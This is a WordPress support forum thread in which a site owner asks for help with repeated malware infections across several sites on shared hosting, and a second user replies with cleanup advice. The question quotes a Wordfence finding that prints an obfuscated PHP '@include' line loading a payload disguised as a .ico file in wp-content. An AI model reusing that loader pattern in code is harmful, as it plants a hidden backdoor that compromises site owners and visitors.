Security issues and malicious files

  • bethplummer

    (@bethplummer)


    8 years, 11 months ago

    It appears my account that hosts several WordPress websites is having a malicious file issue. I don’t have much experience in fixing these type of things.

    I have a Bluehost account.
    It is the cloud hosting plan, but shared I believe.
    I am using Wordfence to restore files.

    Files being affected are:
    File appears to be malicious: wp-config.php
    wp-settings.php
    File appears to be malicious: index.php
    WordPress core file modified: index.php
    WordPress core file modified: wp-settings.php

    This is an example of the code I see
    This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “@include “\x2fh\x6fm\x651\x2fm\x61v\x65r\x69f\x35/\x70u\x62l\x69c\x5fh\x74m\x6c/\x73i\x67n\x73o\x68i\x6f/\x77p\x2dc\x6fn\x74e\x6et\x2fg\x61l\x6ce\x72y\x2ff\x61v\x69c\x6fn\x5f4\x641\x622\x66.\x69c\x6f”…”. The infection type is: Misc:PHP/ico.

    I restore thru Wordfence…but it keeps happening and I have several websites. How do I make this stop? Is there a simple way to take care of this? I think it is odd that this is happening to new installs too, so I am not sure what to do.

Viewing 1 replies (of 1 total)
  • luckychingi

    (@luckychingi)

    8 years, 11 months ago

    If you are on a shared hosting with multiple websites, one infected site can infect other sites too.

    Wordfence can only tell you which files are modified but not show the cause

    Have your hosting company look at the logs. Update all themes, plugins and WordPress Core.

    Check the upload folder for .php files – .php files should not be in the uploads folder.

Viewing 1 replies (of 1 total)

The topic ‘Security issues and malicious files’ is closed to new replies.